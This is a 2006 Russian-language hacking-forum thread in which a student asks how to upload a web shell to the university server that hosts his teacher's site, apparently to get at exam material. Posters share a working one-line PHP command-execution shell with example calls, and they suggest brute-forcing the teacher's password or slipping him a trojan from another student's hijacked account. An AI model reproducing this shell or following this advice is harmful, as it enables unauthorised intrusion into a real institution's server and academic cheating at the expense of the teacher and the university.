ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сайт университета
  #1  
Старый 31.03.2006, 11:08
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию Сайт университета

Учитель имеет сайт на серваке университета. У каждого ученика на сайте университета (не учителя) свой экяунт.
Через этот экяунт мы можем повылать ЛЮБЫЕ файлы учителю. Но когда посылаешь файл то учитель видет от кого он пришел. Также можно хранить на сервере файлы.
Я пробовал залить на сервер файл r57shell.php - он его не берет, видимо потамучто файл много занимет.
Также пробовал залить самодельный шелл shell.php
в нем:
<? system($_GET[c]); ?>
Он его взял залил в ../upload/_3456/shell.php мне на моем экяунте показал ссылку этого файла. Я кликаю на ссылку то мне на белом окне вылетает
<? system($_GET[c]); ?>
Причем когда копируешь эту ссылку файла в буфер потом встовзяешь в internet explorer то те пишут ACCESS Denied.
"Назад к учителю" У него сайт простой из html никаких скриптов.
Мой вопрос у кого есть какие идеи чтоб туда шелл залить. Просто экламен через ниделю.
Извините но полный адрес сайта учителя дать не могу.
Да ща только что пробывал залить эту вышеперечисленую шеллу на другой провереный сервак то просто выпадает пустой скрин.
Зарание спасибо.

Последний раз редактировалось alex-19841; 31.03.2006 в 11:11..
 
Ответить с цитированием

  #2  
Старый 31.03.2006, 13:07
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

дык наверное надо его юзать так
http://www.xxx.com/shell.php?c=id
или
http://www.xxx.com/shell.php&c=id
)
 
Ответить с цитированием

  #3  
Старый 01.04.2006, 13:32
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Ты уверен что на серваке есть поддержка Php?
 
Ответить с цитированием

  #4  
Старый 01.04.2006, 15:01
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

а по твоему ) как оно тогда залило?)
 
Ответить с цитированием

  #5  
Старый 01.04.2006, 19:13
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Через html можно тоже заливать.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #6  
Старый 01.04.2006, 19:16
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

Цитата:
Сообщение от NaX[no]r†  
как оно тогда залило?)
Прикольно сказал
 
Ответить с цитированием

  #7  
Старый 01.04.2006, 19:26
koi8-r
Banned
Регистрация: 02.03.2006
Сообщений: 61
Провел на форуме:
210685

Репутация: -10
Отправить сообщение для koi8-r с помощью ICQ
По умолчанию

попробуй брутом пас угнать или трояном который можно впарить преподу и не со своего аккаунта. как вариант с забрученого аккаунта своего врага...
 
Ответить с цитированием

  #8  
Старый 01.04.2006, 20:03
A110ut
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433

Репутация: 661


По умолчанию

Попробуй вот так:

<?php system($_GET['c']); ?>

Пример использования (для винды) => xttp://site/shell.php?c=dir
 
Ответить с цитированием

  #9  
Старый 01.04.2006, 20:09
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Цитата:
Сообщение от NaX[no]r†  
а по твоему ) как оно тогда залило?)
Ыыы, поспешил=)) прочитал только что r57shell.php не залился, до конца не дочитав пост=(
 
Ответить с цитированием

  #10  
Старый 01.04.2006, 23:10
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Цитата:
ACCESS Denied.
Вроде бы доступ ограничен.

Последний раз редактировалось Tem; 01.04.2006 в 23:13..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ХАМАС открыл сайт для детей-шахидов на Российском хостинге Zaratustra Мировые новости 20 20.05.2006 17:18
Упал сайт после хака phpBB 2.0.11 ... I_XxX_I Форумы 12 12.04.2006 18:22
Как создать свой сайт amneto Болталка 4 13.02.2005 14:04
Сайт SCO [www.sco.com] деликатно взломали ФРАЙ Мировые новости 0 01.12.2004 00:27
Сайт. ПупкиН Чаты 3 04.03.2003 17:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ